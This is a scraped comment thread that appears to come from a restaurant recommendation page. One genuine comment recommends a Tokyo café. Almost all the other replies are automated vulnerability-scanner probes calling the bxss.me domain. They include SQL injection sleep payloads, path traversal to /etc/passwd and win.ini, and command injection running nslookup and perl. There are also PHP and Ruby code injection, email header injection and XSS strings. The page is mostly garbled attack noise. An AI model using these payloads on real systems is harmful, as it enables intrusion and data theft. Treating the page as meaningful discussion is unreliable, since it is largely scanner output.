to@example.com>%0d%0abcc:074625.67-13503.67.be7c5.19990.2@bxss.me

1727140368

re: Brady

'+response.write(9890923*9960614)+'

1727140368

re: Brady

"+response.write(9890923*9960614)+"

1727140369

re: Brady

<esi:include src="http://bxss.me/rpb.png"/>

1727140370

re: Brady

../../../../../../../../../../../../../../etc/passwd

1727140371

re: Brady

${9999741+9999443}

1727140371

re: Brady

../../../../../../../../../../../../../../windows/win.ini

1727140371

re: Brady

file:///etc/passwd

1727140372

re: Brady

../../../../../../../../../../../../../../../proc/version

1727140373

re: Brady

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140374

re: Brady

../../../../../../../../../../etc/passwd%00.jpg

1727140375

re: Brady

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140376

re: Brady

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140377

re: Brady

)

1727140378

re: Brady

'.gethostbyname(lc('hitfy'.'ozilvdsv67fa0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(116).chr(86).'

1727140378

re: Brady

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140379

re: Brady

".gethostbyname(lc("hitiw"."cyhlnlan4c2e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(75).chr(108).chr(86)."

1727140380

re: Brady

!(()&&!|*|*|

1727140380

re: Brady

/etc/passwd

1727140380

re: Brady

echo baypgd$()\ kdgqda\nz^xyu||a #' &echo baypgd$()\ kdgqda\nz^xyu||a #|" &echo baypgd$()\ kdgqda\nz^xyu||a #

1727140380

re: Brady

^(#$!@#$)(()))******

1727140381

re: Brady

%2fetc%2fpasswd

1727140381

re: Brady

&echo zmwtyz$()\ ynadui\nz^xyu||a #' &echo zmwtyz$()\ ynadui\nz^xyu||a #|" &echo zmwtyz$()\ ynadui\nz^xyu||a #

1727140382

re: Brady

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140382

re: Brady

|echo pqakjd$()\ julsmk\nz^xyu||a #' |echo pqakjd$()\ julsmk\nz^xyu||a #|" |echo pqakjd$()\ julsmk\nz^xyu||a #

1727140383

re: Brady

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140383

re: Brady

(nslookup hitskupwfknqn3a98e.bxss.me||perl -e "gethostbyname('hitskupwfknqn3a98e.bxss.me')")

1727140384

re: Brady

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140384

re: Brady

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140384

re: Brady

$(nslookup hitkyjjtxfbvq87445.bxss.me||perl -e "gethostbyname('hitkyjjtxfbvq87445.bxss.me')")

1727140385

1727140385

re: Brady

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140386

re: Brady

&nslookup hitxjezsaubty0a9fa.bxss.me&'\"`0&nslookup hitxjezsaubty0a9fa.bxss.me&`'

1727140386

re: Brady

"+"A".concat(70-3).concat(22*4).concat(117).concat(85).concat(114).concat(75)+(require"socket"
Socket.gethostbyname("hitxk"+"wgpzjfzc07b44.bxss.me.")[3].to_s)+"

1727140386

re: Brady

bxss.me/t/xss.html?%00

1727140386

re: Brady

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140386

re: Brady

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140387

re: Brady

&(nslookup hitocjjxrzafsbd6f1.bxss.me||perl -e "gethostbyname('hitocjjxrzafsbd6f1.bxss.me')")&'\"`0&(nslookup hitocjjxrzafsbd6f1.bxss.me||perl -e "gethostbyname('hitocjjxrzafsbd6f1.bxss.me')")&`'

1727140387

re: Brady

'+'A'.concat(70-3).concat(22*4).concat(116).concat(71).concat(106).concat(86)+(require'socket'
Socket.gethostbyname('hitdf'+'kqlyklhz2828c.bxss.me.')[3].to_s)+'

1727140387

re: Brady

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140387

1727140388

re: Brady

|(nslookup hitvfajrqnrbs054d0.bxss.me||perl -e "gethostbyname('hitvfajrqnrbs054d0.bxss.me')")

1727140388

re: Brady

file:///etc/passwd

1727140388

re: Brady

`(nslookup hitlaknuauwsa86f04.bxss.me||perl -e "gethostbyname('hitlaknuauwsa86f04.bxss.me')")`

1727140388

1727140389

re: Brady

'"

1727140389

re: Brady

/\../\../\../\../\../\../\../etc/passwd

1727140389

re: Brady

;(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")|(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")&(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")

1727140389

re: Brady

/etc/shells

1727140389

re: Brady

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140390

re: Brady

<!--

1727140390

re: Brady

/WEB-INF/web.xml

1727140390

re: Brady

c:/windows/win.ini

1727140390

re: Brady

';print(md5(31337));$a='

1727140391

re: Brady

C:\WINDOWS\system32\drivers\etc\hosts

1727140391

re: Brady

bxss.me

1727140391

re: Brady

";print(md5(31337));$a="

1727140391

re: Brady

../../../../../../../../../../windows/win.ini%00.jpg

1727140391

re: Brady

${@print(md5(31337))}

1727140392

re: Brady

/../../../../../../../../../../boot.ini

1727140392

re: Brady

${@print(md5(31337))}\

1727140393

re: Brady

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140393

re: Brady

'.print(md5(31337)).'

1727140394

re: Brady

..\..\..\..\..\..\..\..\windows\win.ini

1727140394

re: Brady

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140395

re: Brady

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140396

re: Brady

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140397

re: Brady

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140398

re: Brady

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140398

re: Brady

WEB-INF/web.xml

1727140399

re: Brady

WEB-INF\web.xml

1727140400

re: Brady

1

1727140882

re: Brady

1

1727140891

re: Brady

-1 OR 2+465-465-1=0+0+0+1 --

1727140891

re: Brady

-1 OR 3+465-465-1=0+0+0+1 --

1727140891

re: Brady

-1 OR 2+371-371-1=0+0+0+1

1727140891

re: Brady

-1 OR 3+371-371-1=0+0+0+1

1727140892

re: Brady

-1' OR 2+687-687-1=0+0+0+1 --

1727140892

re: Brady

-1' OR 3+687-687-1=0+0+0+1 --

1727140892

re: Brady

-1' OR 2+979-979-1=0+0+0+1 or 'zb4XifSc'='

1727140892

re: Brady

-1' OR 3+979-979-1=0+0+0+1 or 'zb4XifSc'='

1727140893

re: Brady

-1" OR 2+598-598-1=0+0+0+1 --

1727140893

re: Brady

-1" OR 3+598-598-1=0+0+0+1 --

1727140893

re: Brady

if(now()=sysdate(),sleep(15),0)

1727140903

re: Brady

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140912

re: Brady

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140921

re: Brady

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140931

re: Brady

-1; waitfor delay '0:0:15' --

1727140940

re: Brady

-1); waitfor delay '0:0:15' --

1727140949

re: Brady

1 waitfor delay '0:0:15' --

1727140960

re: Brady

LLADVsuH'; waitfor delay '0:0:15' --

1727140971

re: Brady

-5 OR 478=(SELECT 478 FROM PG_SLEEP(15))--

1727140981

re: Brady

-5) OR 475=(SELECT 475 FROM PG_SLEEP(15))--

1727140993

re: Brady

-1)) OR 777=(SELECT 777 FROM PG_SLEEP(15))--

1727141006

re: Brady

P5F0Hdiw' OR 297=(SELECT 297 FROM PG_SLEEP(15))--

1727141018

re: Brady

RvKvVkI6') OR 149=(SELECT 149 FROM PG_SLEEP(15))--

1727141031

re: Brady

IfCwh995')) OR 162=(SELECT 162 FROM PG_SLEEP(15))--

1727141047

re: Brady

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141061

re: Brady

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141077

re: Brady

'||(select 1 from (select pg_sleep(15))x)||'

1727141092

re: Brady

''||(select 1 from (select pg_sleep(15))x)||''

1727141107

re: Brady

1'"

1727141108

re: Brady

@@qC5te

1727141109

My favourite in Tokyo.
Chatei Hatou(茶亭 羽當 渋谷店)
https://tabelog.com/tokyo/A1303/A130301/13001169/

1668130353 Reply
Add photos

re: Leo Saito

ZhjLroKm

1697002498

re: Leo Saito

1*

1697002498

re: Leo Saito

1*

1697002498

re: Leo Saito

1*

1697002499

re: Leo Saito

1*

1697002499

re: Leo Saito

-1 OR 2+291-291-1=0+0+0+1

1697002499

re: Leo Saito

9rdgUWJB

1697002499

re: Leo Saito

-1 OR 3+291-291-1=0+0+0+1

1697002500

re: Leo Saito

1*

1697002500

re: Leo Saito

1*

1697002500

re: Leo Saito

1*

1697002500

re: Leo Saito

1*

1697002500

re: Leo Saito

-1 OR 2+35-35-1=0+0+0+1

1697002501

re: Leo Saito

-1 OR 3+35-35-1=0+0+0+1

1697002501

re: Leo Saito

if(now()=sysdate(),sleep(15),0)

1697002504

re: Leo Saito

if(now()=sysdate(),sleep(15),0)

1697002505

re: Leo Saito

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002508

re: Leo Saito

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002509

re: Leo Saito

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002513

re: Leo Saito

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002514

re: Leo Saito

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002516

re: Leo Saito

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002518

re: Leo Saito

-1; waitfor delay '0:0:15' --

1697002521

re: Leo Saito

-1; waitfor delay '0:0:15' --

1697002523

re: Leo Saito

-1); waitfor delay '0:0:15' --

1697002526

re: Leo Saito

-1); waitfor delay '0:0:15' --

1697002528

re: Leo Saito

1 waitfor delay '0:0:15' --

1697002530

re: Leo Saito

1 waitfor delay '0:0:15' --

1697002532

re: Leo Saito

ggEZXh8p'; waitfor delay '0:0:15' --

1697002535

re: Leo Saito

7HUcc5SL'; waitfor delay '0:0:15' --

1697002536

re: Leo Saito

-5 OR 849=(SELECT 849 FROM PG_SLEEP(15))--

1697002539

re: Leo Saito

-5 OR 382=(SELECT 382 FROM PG_SLEEP(15))--

1697002540

re: Leo Saito

-5) OR 825=(SELECT 825 FROM PG_SLEEP(15))--

1697002543

re: Leo Saito

-5) OR 533=(SELECT 533 FROM PG_SLEEP(15))--

1697002545

re: Leo Saito

-1)) OR 195=(SELECT 195 FROM PG_SLEEP(15))--

1697002548

re: Leo Saito

-1)) OR 694=(SELECT 694 FROM PG_SLEEP(15))--

1697002550

re: Leo Saito

VQKYEmNS' OR 241=(SELECT 241 FROM PG_SLEEP(15))--

1697002553

re: Leo Saito

zlVD4LMp' OR 797=(SELECT 797 FROM PG_SLEEP(15))--

1697002555

re: Leo Saito

DMwBJWb2') OR 102=(SELECT 102 FROM PG_SLEEP(15))--

1697002558

re: Leo Saito

nKf27twh') OR 570=(SELECT 570 FROM PG_SLEEP(15))--

1697002560

re: Leo Saito

vHRYTkgW')) OR 847=(SELECT 847 FROM PG_SLEEP(15))--

1697002562

re: Leo Saito

GcgpC4Fb')) OR 146=(SELECT 146 FROM PG_SLEEP(15))--

1697002565

re: Leo Saito


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002567

re: Leo Saito


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002570

re: Leo Saito


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002572

re: Leo Saito


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002574

re: Leo Saito

'||(select 1 from (select pg_sleep(15))x)||'

1697002576

re: Leo Saito

'||(select 1 from (select pg_sleep(15))x)||'

1697002577

re: Leo Saito

''||(select 1 from (select pg_sleep(15))x)||''

1697002581

re: Leo Saito

1'"

1697002581

re: Leo Saito

@@z1P2f

1697002582

re: Leo Saito

''||(select 1 from (select pg_sleep(15))x)||''

1697002582

re: Leo Saito

1'"

1697002583

re: Leo Saito

@@jPmP9

1697002584

re: Leo Saito

1FBVRMSzO

1727140339

re: Leo Saito

%0abcc:074625.67-13441.67.8852f.19990.2@bxss.me

1727140341

re: Leo Saito

to@example.com>%0d%0abcc:074625.67-13442.67.8852f.19990.2@bxss.me

1727140342

re: Leo Saito

response.write(9623498*9346451)

1727140342

re: Leo Saito

'+response.write(9623498*9346451)+'

1727140343

re: Leo Saito

<esi:include src="http://bxss.me/rpb.png"/>

1727140344

re: Leo Saito

"+response.write(9623498*9346451)+"

1727140344

re: Leo Saito

${9999023+10000330}

1727140345

re: Leo Saito

../../../../../../../../../../../../../../etc/passwd

1727140346

re: Leo Saito

../../../../../../../../../../../../../../windows/win.ini

1727140347

re: Leo Saito

file:///etc/passwd

1727140348

re: Leo Saito

../../../../../../../../../../../../../../../proc/version

1727140349

re: Leo Saito

'.gethostbyname(lc('hitzj'.'rudfhdde18761.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(73).chr(120).chr(69).'

1727140349

re: Leo Saito

)

1727140350

re: Leo Saito

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140350

re: Leo Saito

".gethostbyname(lc("hitqf"."zmtbfpds7ef16.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(75).chr(122).chr(83)."

1727140350

re: Leo Saito

!(()&&!|*|*|

1727140350

re: Leo Saito

../../../../../../../../../../etc/passwd%00.jpg

1727140351

re: Leo Saito

^(#$!@#$)(()))******

1727140351

re: Leo Saito

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140351

re: Leo Saito

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140352

re: Leo Saito

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140353

re: Leo Saito

/etc/passwd

1727140354

re: Leo Saito

echo fcpgjx$()\ meeiob\nz^xyu||a #' &echo fcpgjx$()\ meeiob\nz^xyu||a #|" &echo fcpgjx$()\ meeiob\nz^xyu||a #

1727140355

re: Leo Saito

%2fetc%2fpasswd

1727140355

1727140355

re: Leo Saito

&echo cbbdma$()\ jkdzjk\nz^xyu||a #' &echo cbbdma$()\ jkdzjk\nz^xyu||a #|" &echo cbbdma$()\ jkdzjk\nz^xyu||a #

1727140355

re: Leo Saito

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140356

re: Leo Saito

"+"A".concat(70-3).concat(22*4).concat(105).concat(67).concat(111).concat(66)+(require"socket"
Socket.gethostbyname("hitaw"+"bxthxhnq27188.bxss.me.")[3].to_s)+"

1727140356

re: Leo Saito

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140356

re: Leo Saito

bxss.me/t/xss.html?%00

1727140356

re: Leo Saito

|echo wunapu$()\ ngnvhp\nz^xyu||a #' |echo wunapu$()\ ngnvhp\nz^xyu||a #|" |echo wunapu$()\ ngnvhp\nz^xyu||a #

1727140356

re: Leo Saito

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140356

re: Leo Saito

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140356

re: Leo Saito

'+'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(107).concat(73)+(require'socket'
Socket.gethostbyname('hitlu'+'qckhwnmp5aa00.bxss.me.')[3].to_s)+'

1727140357

re: Leo Saito

';print(md5(31337));$a='

1727140357

re: Leo Saito

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140357

re: Leo Saito

(nslookup hitowastrsjqn1f727.bxss.me||perl -e "gethostbyname('hitowastrsjqn1f727.bxss.me')")

1727140357

re: Leo Saito

1727140357

re: Leo Saito

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140357

re: Leo Saito

";print(md5(31337));$a="

1727140358

re: Leo Saito

$(nslookup hiteeyldufampa98b0.bxss.me||perl -e "gethostbyname('hiteeyldufampa98b0.bxss.me')")

1727140358

1727140359

re: Leo Saito

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140359

re: Leo Saito

${@print(md5(31337))}

1727140359

re: Leo Saito

&nslookup hitqtjanpimowc5a04.bxss.me&'\"`0&nslookup hitqtjanpimowc5a04.bxss.me&`'

1727140359

re: Leo Saito

/etc/shells

1727140359

re: Leo Saito

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140359

re: Leo Saito

${@print(md5(31337))}\

1727140360

re: Leo Saito

&(nslookup hitbrlcdwsrgk826f0.bxss.me||perl -e "gethostbyname('hitbrlcdwsrgk826f0.bxss.me')")&'\"`0&(nslookup hitbrlcdwsrgk826f0.bxss.me||perl -e "gethostbyname('hitbrlcdwsrgk826f0.bxss.me')")&`'

1727140360

re: Leo Saito

c:/windows/win.ini

1727140361

re: Leo Saito

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././